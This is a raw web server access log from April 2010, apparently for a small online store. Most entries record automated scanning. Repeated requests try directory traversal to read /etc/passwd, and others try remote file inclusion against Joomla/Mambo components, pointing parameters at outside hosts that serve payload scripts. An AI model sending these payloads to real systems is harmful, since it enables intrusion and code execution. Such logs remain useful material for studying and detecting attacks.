209.16.102.2 - - [16/Apr/2010:01:17:47 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
64.165.76.12 - - [16/Apr/2010:01:17:57 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
217.23.8.91 - - [16/Apr/2010:01:17:59 -0400] "GET /logs/error_log.Q109111400//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.228.111.219 - - [16/Apr/2010:01:18:00 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
209.59.12.99 - - [16/Apr/2010:01:18:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.204.54 - - [16/Apr/2010:01:18:02 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
66.249.67.232 - - [16/Apr/2010:01:18:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC5371A6A00063B300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.48.74.7 - - [16/Apr/2010:01:18:02 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
217.23.8.91 - - [16/Apr/2010:01:18:07 -0400] "GET /logs/access_log.Q109111400//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:01:18:09 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8274F2509589B0004287052+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
217.23.8.91 - - [16/Apr/2010:01:18:27 -0400] "GET /logs/error_log.Q109111400//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:18:39 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:18:39 -0400] "GET /logs/access_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:18:39 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:01:18:59 -0400] "GET /?REX[INCLUDE_PATH]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:01:18:59 -0400] "GET /logs/error_log.Q109052000/?REX[INCLUDE_PATH]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:01:18:59 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 46442 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:01:19:06 -0400] "GET /logs/error_log.Q109061900/?REX[INCLUDE_PATH]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:01:19:42 -0400] "GET /logs/error_log.Q109061900/?REX[INCLUDE_PATH]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.26.184 - - [16/Apr/2010:01:20:21 -0400] "GET /logs/access_log.Q110011600//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kkoraji.net/files/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.78.238.157 - - [16/Apr/2010:01:20:24 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:20:24 -0400] "GET /logs/access_log.Q109112300//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:20:24 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:21:07 -0400] "GET /logs/access_log.Q110030500/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:21:20 -0400] "GET /logs/error_log.Q109080200//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:21:29 -0400] "GET /logs/access_log.Q109112600//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:22:38 -0400] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:22:38 -0400] "GET /logs/access_log.Q109121400%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:22:38 -0400] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:22:53 -0400] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:22:53 -0400] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:22:53 -0400] "GET /logs/access_log.Q109121400%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:01:23:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC537236E00066B300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.204.54 - - [16/Apr/2010:01:24:03 -0400] "GET /logs/access_log.Q109112600///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
94.23.204.54 - - [16/Apr/2010:01:24:04 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
94.23.204.54 - - [16/Apr/2010:01:24:04 -0400] "GET /logs///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
139.168.143.136 - - [16/Apr/2010:01:24:25 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8274F2509589B0004287052+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:01:24:26 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:01:24:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.23.204.54 - - [16/Apr/2010:01:24:41 -0400] "GET /logs/error_log.Q109100100///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.121.26.184 - - [16/Apr/2010:01:24:43 -0400] "GET /logs/error_log.Q110011600//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kkoraji.net/files/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.78.238.157 - - [16/Apr/2010:01:24:59 -0400] "GET /logs//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:24:59 -0400] "GET //////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:24:59 -0400] "GET /logs/access_log.Q109090900//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:24:59 -0400] "GET /logs/access_log.Q110030300//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:01:24:47 -0400] "GET /logs/error_log.Q109111600 HTTP/1.0" 200 2302619 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.78.238.157 - - [16/Apr/2010:01:25:03 -0400] "GET /logs//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:25:03 -0400] "GET /logs/access_log.Q110030300//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:25:03 -0400] "GET /logs//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:25:03 -0400] "GET /logs/access_log.Q109071600%20%20//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 304 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:25:03 -0400] "GET //////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:25:03 -0400] "GET //////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:25:03 -0400] "GET /logs/access_log.Q109090900//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:25:24 -0400] "GET /logs/access_log.Q110013100%20%20//////administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 304 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:01:26:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.16.102.2 - - [16/Apr/2010:01:28:35 -0400] "GET /logs/access_log.Q109112600///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
209.16.102.2 - - [16/Apr/2010:01:28:35 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
209.16.102.2 - - [16/Apr/2010:01:28:35 -0400] "GET /logs///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
64.165.76.12 - - [16/Apr/2010:01:28:47 -0400] "GET /logs/access_log.Q109112600///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
64.165.76.12 - - [16/Apr/2010:01:28:47 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
64.165.76.12 - - [16/Apr/2010:01:28:48 -0400] "GET /logs///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
92.48.74.7 - - [16/Apr/2010:01:28:55 -0400] "GET /logs/access_log.Q109112600///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
92.48.74.7 - - [16/Apr/2010:01:28:56 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
92.48.74.7 - - [16/Apr/2010:01:28:56 -0400] "GET /logs///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
209.16.102.2 - - [16/Apr/2010:01:29:03 -0400] "GET /logs/error_log.Q109100100///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
118.129.170.49 - - [16/Apr/2010:01:29:03 -0400] "GET /logs//cropcanvas.php?cropimagedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:29:03 -0400] "GET /logs/access_log.Q109071600%20%20//cropcanvas.php?cropimagedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:29:03 -0400] "GET //cropcanvas.php?cropimagedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:29:04 -0400] "GET //cropcanvas.php?cropimagedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:29:04 -0400] "GET /logs//cropcanvas.php?cropimagedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:29:05 -0400] "GET /logs/access_log.Q109071600%20%20//cropcanvas.php?cropimagedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.165.76.12 - - [16/Apr/2010:01:29:12 -0400] "GET /logs/error_log.Q109100100///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
94.23.204.54 - - [16/Apr/2010:01:29:16 -0400] "GET /logs/access_log.Q109112600///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
94.23.204.54 - - [16/Apr/2010:01:29:16 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
94.23.204.54 - - [16/Apr/2010:01:29:17 -0400] "GET /logs///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
118.129.170.49 - - [16/Apr/2010:01:29:21 -0400] "GET /logs/access_log.Q109052100%20%20//cropcanvas.php?cropimagedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:29:23 -0400] "GET /logs/access_log.Q109052100%20%20//cropcanvas.php?cropimagedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
123.125.66.123 - - [16/Apr/2010:01:29:23 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.67.232 - - [16/Apr/2010:01:29:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0151085A07018500C96B092+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.48.74.7 - - [16/Apr/2010:01:29:29 -0400] "GET /logs/error_log.Q109100100///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
94.23.204.54 - - [16/Apr/2010:01:29:54 -0400] "GET /logs/error_log.Q109100100///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
67.228.111.219 - - [16/Apr/2010:01:29:58 -0400] "GET /logs/access_log.Q109112600///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
67.228.111.219 - - [16/Apr/2010:01:29:59 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
67.228.111.219 - - [16/Apr/2010:01:30:01 -0400] "GET /logs///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
67.228.111.219 - - [16/Apr/2010:01:30:28 -0400] "GET /logs/error_log.Q109100100///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
220.181.7.65 - - [16/Apr/2010:01:30:52 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
116.122.36.61 - - [16/Apr/2010:01:31:27 -0400] "GET /logs/error_log.Q110040500%20%20//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:31:27 -0400] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:31:27 -0400] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:31:34 -0400] "GET /logs/access_log.Q110031400%20%20//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:01:31:04 -0400] "GET /logs/error_log.Q110030400 HTTP/1.0" 200 4411028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.252 - - [16/Apr/2010:01:31:40 -0400] "GET /logs/access_log.Q109121600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.252 - - [16/Apr/2010:01:31:15 -0400] "GET /logs/error_log.Q109072600 HTTP/1.0" 200 2437170 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.252 - - [16/Apr/2010:01:31:42 -0400] "GET /logs/error_log.Q109072600 HTTP/1.0" 200 2437170 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.122.36.61 - - [16/Apr/2010:01:32:08 -0400] "GET /logs/error_log.Q110040500%20%20//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:08 -0400] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:08 -0400] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:15 -0400] "GET /logs/access_log.Q110031400%20%20//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:32:23 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:26 -0400] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:26 -0400] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:26 -0400] "GET /logs/error_log.Q110040500%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:32:32 -0400] "GET /logs/access_log.Q110010900//include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:36 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:51 -0400] "GET /logs/error_log.Q110040500%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:51 -0400] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:32:51 -0400] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:33:06 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:33:45 -0400] "GET //////com_mospray/scripts/admin.php?basedir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:33:45 -0400] "GET /logs//////com_mospray/scripts/admin.php?basedir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:33:45 -0400] "GET /logs/error_log.Q109051500//////com_mospray/scripts/admin.php?basedir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:33:58 -0400] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:33:58 -0400] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:33:58 -0400] "GET /logs/error_log.Q110040500%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:01:34:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.78.238.157 - - [16/Apr/2010:01:34:06 -0400] "GET //////com_mospray/scripts/admin.php?basedir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:34:06 -0400] "GET /logs/error_log.Q109051500//////com_mospray/scripts/admin.php?basedir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
